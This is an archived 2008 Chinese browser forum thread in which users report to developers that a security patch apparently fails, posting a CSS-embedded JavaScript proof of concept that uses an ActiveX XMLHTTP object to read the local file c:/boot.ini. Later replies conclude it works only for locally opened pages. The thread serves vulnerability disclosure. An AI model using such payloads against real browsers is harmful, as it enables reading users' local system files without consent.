世界之窗论坛's Archiver

52twb 发表于 2008-7-2 20:46

安全浏览?形同虚设——

刚才看了帖子说,2.2.0.1修补了IE的漏洞,测试了一下,很失望。
发此贴,主旨向开发组反应,不是戳TW的丑,:blood:

[[i] 本帖最后由 52twb 于 2008-7-2 20:49 编辑 [/i]]

52twb 发表于 2008-7-2 20:47

测试的代码如下:
<body>
<style type="text/css">
body{background:url('javascript:XMLHTTP=new ActiveXObject("Msxml2.XMLHTTP.3.0");XMLHTTP.open("GET","c:/boot.ini",false);XMLHTTP.send();alert(XMLHTTP.responseText);')}
</style>
<img src=""></img>
</body>

himmel 发表于 2008-7-2 21:00

好啊~~~~早点修复,造福用户~~~~

AY 发表于 2008-7-2 21:24

这个是 IE 内核的问题,透过 safe for scripting 的 activex 控件,网页应该是不能读取本地档案的,但这样就可以:[code]XMLHTTP=new ActiveXObject("Msxml2.XMLHTTP.3.0");
XMLHTTP.open("GET","c:/boot.ini",false);
XMLHTTP.send();
alert(XMLHTTP.responseText);[/code]问题是 IE7 自己竟然又再次不受影响 ... 希望只是偶然的 ... :cold:

52twb 发表于 2008-7-2 23:21

[quote]原帖由 [i]AY[/i] 于 2008-7-2 21:24 发表 [url=http://bbs.ioage.com/cn/redirect.php?goto=findpost&pid=588395&ptid=62043][img]http://bbs.ioage.com/cn/images/common/back.gif[/img][/url]
这个是 IE 内核的问题,问题是 IE7 自己竟然又再次不受影响 ... 希望只是偶然的 [/quote]

IE7.0真的这么牛??:wait:

mutalisker 发表于 2008-7-3 16:33

如果这个页面是在本地, 那有这样的权限会有什么问题呢?

多指教

AY 发表于 2008-7-3 19:51

[quote]原帖由 [i]mutalisker[/i] 于 2008-7-3 16:33 发表 [url=http://bbs.ioage.com/cn/redirect.php?goto=findpost&pid=588845&ptid=62043][img]http://bbs.ioage.com/cn/images/common/back.gif[/img][/url]
如果这个页面是在本地, 那有这样的权限会有什么问题呢?

多指教 [/quote]
啊,的确是本地才有效,那应该没有什么问题了。 :)

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.